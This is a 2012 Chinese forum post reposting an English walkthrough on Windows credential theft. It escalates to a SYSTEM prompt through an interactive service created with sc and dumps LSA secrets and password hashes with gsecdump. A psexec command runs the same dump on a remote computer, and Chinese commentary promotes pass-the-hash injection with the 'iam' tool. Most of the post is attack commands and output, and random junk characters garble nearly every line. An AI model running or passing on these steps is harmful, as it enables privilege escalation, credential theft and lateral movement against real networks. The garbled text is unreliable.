o get a DOS Prompt as NT system:
5 n m" m1 m4 f3 c- Q1 B: T3 m$ W9 G9 o: l
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
6 i9 s$ d) x* U+ ]& ~7 \1 ^9 ]% u[SC] CreateService SUCCESS2 d8 \# ^& E" f5 p; H; |% e
$ t3 L- }) t( d/ d1 E2 A+ U& @' u
C:\>sc start shellcmdline& M" ?$ H9 D x j7 Q4 N8 P
[SC] StartService FAILED 1053:0 [. g) r7 `2 ?) i ^
& Y o# k: O. U( ^1 qThe service did not respond to the start or control request in a timely fashion.
: s; V; N! c- z" t# F' |5 k' G8 F' e( S2 i
C:\>sc delete shellcmdline0 w% g; q. z" s% m/ x/ H% z
[SC] DeleteService SUCCESS, q! u7 S) |+ G, s$ j" W
7 s7 m: A4 _2 K/ a8 I6 y/ `
------------6 R* g! x0 x1 a0 d# f/ Z& P
5 q% \8 R0 S' S E& ]' fThen in the new DOS window:0 O- }# `9 G5 Q1 j
; }* t" @+ h" u, J7 i: Y; @( DMicrosoft Windows XP [Version 5.1.2600]4 o6 T; n; j I% N
(C) Copyright 1985-2001 Microsoft Corp.
2 ?6 ?5 U' ^/ E$ n
* N. q( E* f2 W$ l7 ~C:\WINDOWS\system32>whoami0 N, Q- Z: |+ C; `: M% a
NT AUTHORITY\SYSTEM
, s, k8 R& b' a0 x/ Z" `
( n/ s2 U+ z+ Q* h0 n3 dC:\WINDOWS\system32>gsecdump -h x9 [8 A2 L v7 S8 L9 ^" e
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
_) }, F( n" E+ H8 ousage: gsecdump [options]
% Z8 N- z) F, w$ k* K
1 _6 \6 B9 E* F( s4 u) }# d: Eoptions:
& j8 Q! U# N7 r-h [ --help ] show help
: e/ |) B/ S2 V-a [ --dump_all ] dump all secrets1 u" ~3 l a2 x) g& W
-l [ --dump_lsa ] dump lsa secrets: K' w4 c" L7 c, \( _: K% R
-w [ --dump_wireless ] dump microsoft wireless connections
9 Q! c5 k! k* {, h-u [ --dump_usedhashes ] dump hashes from active logon sessions
4 o% D' {. ]! {4 M/ y/ J# I1 @-s [ --dump_hashes ] dump hashes from SAM/AD
# P5 X* C7 q6 }
. K; }( n5 e5 |. K) SAlthough I like to use:
# ^( _ m( P- H. f% V$ x( B6 S: S" i- S( V) H9 e( Q& }6 w6 {& o
PsExec v1.83 - Execute processes remotely
6 P' p% n% K5 A0 C0 C5 y" u$ S2 bCopyright (C) 2001-2007 Mark Russinovich2 _7 Q( f* ^( j
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
\/ ^3 q3 ?8 X# T/ ~5 ^2 f$ D3 t- m* [
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
! h! ~7 l- z' D" d* a) @+ ~; Z
' m ?) y' G# g# ito get the hashes from active logon sessions of a remote system.
3 c! J/ |. l! C* h
4 b/ v$ h( k# a9 q( YThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.* I, P# H; E; K! O8 F& U( n
, I2 q t) L. T- H+ n
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.% Y; @5 b/ h# y- G+ i
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]% g# c( C, U/ X. V0 [% k' H+ D5 c
& j1 |" y& w, I: ]我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
c, T: |) G& z% `% R3 n4 j |
发表于 2012-11-6 21:09:29
收藏
支持
反对